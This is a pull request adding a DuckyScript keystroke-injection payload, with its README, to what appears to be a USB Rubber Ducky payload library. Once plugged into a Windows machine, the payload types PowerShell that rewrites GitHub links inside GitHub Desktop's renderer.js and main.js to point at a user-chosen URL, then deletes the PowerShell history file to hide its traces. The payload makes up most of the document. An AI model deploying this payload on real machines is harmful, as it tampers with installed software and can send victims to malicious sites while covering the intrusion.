### PR TITLE
Replace Links In GithubDesktop

### DIFF
--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md
@@ -1,0 +1,67 @@
+# Replace Links In GithubDesktop
+
+This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
+
+## Table of Contents
+
+- [Features](#features)
+- [Prerequisites](#prerequisites)
+- [Usage](#usage)
+- [Credits](#credits)
+
+## Features
+
+This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
+
+1. Detects the installation folder of GitHub Desktop.
+2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
+3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
+
+The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
+
+## Prerequisites
+
+- **Windows 10/11**
+- **GitHub Desktop** installed on the machine.
+
+## Usage
+
+1. **Modify the script**:
+   - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
+     ```duckyscript
+     DEFINE #NEW_LINK example.com
+     ```
+
+2. **Customization**:
+   - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
+     ```ducky
+     DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+     ```
+
+3. **Execution**:
+   - Upon execution, the script will:
+     - Open PowerShell.
+     - Detect the GitHub Desktop installation directory.
+     - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md
@@ -2,6 +2,8 @@
 
 This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
 
+![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
+
 ## Table of Contents
 
 - [Features](#features)

--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
@@ -73,7 +73,7 @@ DELAY 1000
 STRINGLN PowerShell
 DELAY 1000
 
-STRINGLN
+STRINGLN_POWERSHELL
     $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
 
     $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }

--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
@@ -1,0 +1,109 @@
+REM_BLOCK
+#####################################################
+#                                                   #
+# Title        : Replace Links In GithubDesktop     #
+# Author       : Aleff                              #
+# Version      : 1.0                                #
+# Category     : Execution                          #
+# Target       : Windows 10/11                      #
+#                                                   #
+#####################################################
+END_REM
+
+
+REM REQUIRED - Define here the new url that will replace the original github link
+DEFINE #NEW_LINK example.com
+
+REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
+DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+
+
+REM_BLOCK
+    Credits:    Hak5 LLC
+    Website:    https://hak5.org/
+    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN
+    $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
+
+    $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
+
+    $versions = $folders | ForEach-Object {
+        [PSCustomObject]@{
+            FolderName = $_.Name
+            Version = [version]($_.Name -replace "app-", "")
+        }
+    }
+
+    $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
+
+    $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
+    $latestFolderPath += "\resources\app\"
+    $renderer = "renderer.js"
+    $main = "main.js"
+
+    $filePath = "$latestFolderPath$renderer"
+
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"'
+    $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
+    Set-Content -Path $filePath -Value $modifiedContent
+
+
+    $filePath = "$latestFolderPath$main"
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
+    $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
+    Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+
+END_STRINGLN

--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
@@ -95,7 +95,8 @@ STRINGLN
     $filePath = "$latestFolderPath$renderer"
 
     $fileContent = Get-Content $filePath
-    $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"'
+    $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)
+'
     $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
     Set-Content -Path $filePath -Value $modifiedContent
 


### PR DESCRIPTION
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.

![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)